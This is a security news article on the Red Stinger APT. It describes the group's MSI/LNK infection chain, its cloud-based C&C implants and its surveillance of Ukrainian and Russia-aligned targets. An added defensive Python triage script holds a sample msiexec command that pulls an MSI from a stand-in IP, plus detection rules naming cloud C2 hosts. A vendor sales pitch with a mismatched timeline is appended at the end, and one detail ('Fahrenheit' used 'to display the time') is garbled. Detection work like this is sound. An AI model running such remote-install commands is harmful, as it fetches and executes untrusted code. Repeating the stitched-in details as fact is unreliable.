New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe


A previously undetected advanced persistent threat (APT) actor, tracked as Red Stinger, has been linked to attacks targeting Eastern Europe since 2020.

“Military, transport and critical infrastructure were among the entities targeted, as well as some involved in September’s Eastern Ukraine referendums,” Malwarebytes revealed in a report released today.

“Depending on the campaign, attackers were able to exfiltrate snapshots, USB drives, keystrokes and microphone recordings.”

Red Stinger overlaps with a cluster of threats Kaspersky disclosed under the name Bad Magic last month as targeting government, agricultural and transport organizations located in Donetsk, Lugansk and Crimea last year.


While there were indications that the APT group may have been active since at least September 2021, Malwarebytes’ latest findings push the group’s origins back nearly a year, with the first operation taking place in December 2020.

At the time, the attack chain is said to have leveraged malicious installation (MSI) files to drop the DBoxShell (aka PowerMagic) implant on compromised systems. The MSI file itself is downloaded by a Windows shortcut (LNK) file contained within a ZIP archive.

Subsequent waves detected in April and September 2021 have been observed to leverage similar attack chains, albeit with minor variations in MSI file names.

A fourth set of attacks coincided with the start of the Russian military invasion of Ukraine in February 2022. The last known activity associated with Red Stinger occurred in September 2022, as documented by Kaspersky.

“DBoxShell is malware that uses cloud storage services as a command and control (C&C) mechanism,” said security researchers Roberto Santos and Hossein Jazi.


“This stage serves as an entry point for attackers, allowing them to assess whether the targets are interesting or not, meaning they will use different tools at this stage.”

The fifth operation is also notable for providing an alternative to DBoxShell called GraphShell, so named for its use of the Microsoft Graph API for C&C purposes.

The initial infection phase is followed by the threat actor deploying additional artifacts such as ngrok, rsockstun (a reverse tunneling utility), and a binary that exfiltrates victims’ data to a Dropbox account controlled by the actor.
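The two behaviours described above, a shortcut-launched msiexec fetching a remote MSI and implants talking to cloud storage or the Microsoft Graph API for C&C, are both visible in ordinary endpoint telemetry. The following triage script is an added example, not code from Malwarebytes or the report; the events, paths, IP address and file names are constructed for illustration, and only the graph.microsoft.com and Dropbox API hostnames come from services named in the article.

```python
import re

# Constructed sample events in a Sysmon-like shape (not real telemetry from
# the campaign). Event 1 models the ZIP -> LNK -> msiexec chain: explorer.exe
# (the user double-clicking the shortcut) spawning msiexec with a URL.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i http://198.51.100.7/update.msi /qn"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\Downloads\7zip.msi /qn"},
    {"type": "network", "image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
     "dest_host": "graph.microsoft.com", "dest_port": 443},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
    {"type": "network", "image": r"C:\ProgramData\sync.exe",
     "dest_host": "content.dropboxapi.com", "dest_port": 443},
]

# msiexec installing straight from a URL is rare in managed environments.
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Legitimate services that DBoxShell/GraphShell-style implants abuse as C&C.
CLOUD_C2_HOSTS = {"graph.microsoft.com", "api.dropboxapi.com",
                  "content.dropboxapi.com"}
# Processes expected to reach those hosts; everything else outside trusted
# install directories is worth a look.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
TRUSTED_DIRS = (r"c:\program files", r"c:\windows\system32")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (rule, detail) tuples for events matching either behaviour."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            if basename(ev["image"]) == "msiexec.exe" and URL_RE.search(ev["cmdline"]):
                findings.append(("remote_msi_install",
                                 f"{basename(ev['parent'])} -> {ev['cmdline']}"))
        elif ev["type"] == "network":
            proc = basename(ev["image"])
            if (ev["dest_host"] in CLOUD_C2_HOSTS and proc not in BROWSERS
                    and not ev["image"].lower().startswith(TRUSTED_DIRS)):
                findings.append(("cloud_api_from_unusual_process",
                                 f"{proc} -> {ev['dest_host']}"))
    return findings
```

Tune BROWSERS and TRUSTED_DIRS to the software actually deployed in your estate; the point is that cloud-API traffic from a process in a user-writable directory is the anomaly, not the destination itself.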

The exact scale of the infections is unclear, although evidence points to two victims located in central Ukraine, a military target and an officer working on critical infrastructure, who were compromised as part of the attacks in February 2022.


In both cases, threat actors extracted screenshots, microphone recordings, and office documents after a reconnaissance period. One of the victims also had his keystrokes recorded and uploaded.

The September 2022 set of intrusions, on the other hand, is notable in that it primarily targeted regions aligned with Russia, including officials and individuals involved in the election. One of the surveillance targets had data on their USB drives exfiltrated.

Malwarebytes said it also identified a library in the Ukrainian city of Vinnytsia that was infected as part of the same campaign, making it the only Ukraine-related entity it targeted. The motivations are currently unknown.

While the origins of the threat group are a mystery, it has emerged that threat actors managed to infect their own Windows 10 machines sometime in December 2022, either accidentally or for testing purposes (with the name TstUser), offering insight into its modus operandi.

Two things stand out: the choice of English as the default language and the use of the Fahrenheit temperature scale to display the time, which probably suggests the involvement of native English speakers.

“In this case, attributing the attack to a specific country is not an easy task,” the researchers said. “Any of the involved countries or aligned groups could be responsible, as some victims were aligned with Russia and others with Ukraine.”

“What is clear is that the main motive behind the attack was surveillance and data collection. The attackers used different layers of protection, had a broad set of tools for their victims, and the attack was clearly aimed at specific entities.”

The Eastern European region faces an emerging cyber security threat. A new Advanced Persistent Threat (APT) group, known as Red Stinger, has been launching targeted attacks against military and critical infrastructure located in the region.

Red Stinger has used a range of tactics, techniques, and procedures over the past few months to gain access to sensitive networks and extract critical data. The attack surface of the Eastern European region has grown over the past year, since the start of the pandemic, as organizations have moved to more digital devices and gained access to sensitive databases.

Ikaroa, a full stack cybersecurity company, is committed to providing detailed security assessments and countermeasures for organizations in the Eastern European region. We work to identify any vulnerabilities, detect malicious activities and provide deep data protection for high-profile customers.

Our experts use the most advanced technologies in the field and have the expertise to prevent, detect and report incidents caused by APT such as Red Stinger. We also provide risk analyses, develop defensive and preventative measures, and deploy comprehensive security architecture that keeps businesses safe.

By using advanced monitoring and analysis tools, Ikaroa can quickly identify malicious activities and reduce the damage done by these threats. Our team also provides complete incident response, including post-incident analysis, to help organizations gain a full understanding of their situation and cope with the aftermath.

We are here to help ensure the security of organizations in the Eastern European region and to mitigate any cyber security threats. In collaboration with our customers, our goal is to prevent further malicious activity and build a secure environment for critical infrastructure and military operations.
